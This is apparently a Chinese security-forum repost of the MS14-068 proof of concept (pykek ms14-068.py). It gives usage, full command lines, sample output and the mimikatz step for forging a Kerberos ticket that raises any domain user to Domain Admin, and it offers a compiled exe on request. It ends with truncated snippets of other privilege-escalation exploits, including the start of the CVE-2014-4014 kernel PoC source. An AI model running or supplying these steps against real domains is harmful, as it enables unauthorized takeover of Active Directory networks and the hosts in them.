MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员

http://zone.wooyun.org/content/17102

https://www.t00ls.net/thread-28706-1-1.html

https://github.com/bidord/pykek

ms14-068.py

Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

Domain Users (513) 
Domain Admins (512) 
Schema Admins (518) 
Enterprise Admins (519) 
Group Policy Creator Owners (520)

USAGE:

ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS: 
    -p <clearPassword> 
--rc4 <ntlmHash> 
Example usage :

Linux (tested with samba and MIT Kerberos)

[email protected]:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! 
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! 
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! 
  [+] Creating ccache file ‘[email protected]‘... Done! 
[email protected]:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0

On Windows

python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc 
mimikatz.exe "kerberos::ptc [email protected]" exit`

exe版土司已发,需要的可以联系我。

时间: 2024-12-29 04:14:06

MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员的相关文章

MS14-068 任何域内用户提升为域管理员PoC -中国寒龙

ms14-068.py Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups : Domain Users (513)Domain Adm

CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

/**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://hashcrack.org  *  * Usage: ./poc [file_path]  *  * where file_path is the file on which you want to set the sgid bit  */ #define _GNU_SOURCE #include <s

Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which enables arbitrary code execution within the kernel. The vulnerability affected all devices based on Qualcomm chipsets (that is, based on the "msm&quo

FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

/* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * This exploit based on open source project, I can make it open source too. Right? * * If you blaming me for open sourcing this exploit, you can fuck your

Acunetix WVS 10 - Local Privilege escalation

'''========================================================================Acunetix WVS 10 - from guest to Sytem (Local privilege escalation) CVE: CVE-2015-4027Author: (me) Daniele LinguaglossaAffected Product: Acunetix WVS 10Exploit: Local privilege

[fw]Nvidia Linux Drive Privilege Escalation

/* Anonymous * * How to use: sudo rm -rf / * * greetz: djrbliss, kad, Ac1dB1tch3z, nVidia! * * Only complete fix patch nvidia drivers and redefine * IS_BLACKLISTED_REG_OFFSET: #define IS_BLACKLISTED_REG_OFFSET(nv, offset, length) 1 */ #define _GNU_SO

[转]Mac OS X local privilege escalation (IOBluetoothFamily)

Source:?http://joystick.artificialstudios.org/2014/10/mac-os-x-local-privilege-escalation.html Nowadays, exploitation of user-level vulnerabilities is becoming more and more difficult, because of the widespread diffusion of several protection methods

Windows XP SP1 Privilege Escalation

MS05-018 MS05-018 Works for Windows 2K SP3/4 | Windows XP SP1/2 Download ms05-018.exe: https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/windows%E6%8F%90%E6%9D%83%E5%B7%A5%E5%85%B7/MS05018%E2%80%94C

从外网到域控(vulnstack靶机实战)

前言 vlunstack是红日安全团队出品的一个实战环境,具体介绍请访问:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 拓扑结构大体如下: 话不多说,直接开搞.. 外网初探 打开页面后发现是一个Yxcms的站点,关于Yxcms的漏洞可以参考:https://www.freebuf.com/column/162886.html 然后找到后台,随手一个弱口令:admin.123456便进入了后台(实战中也有很多的站点是弱口令,只能说千里之堤溃于蚁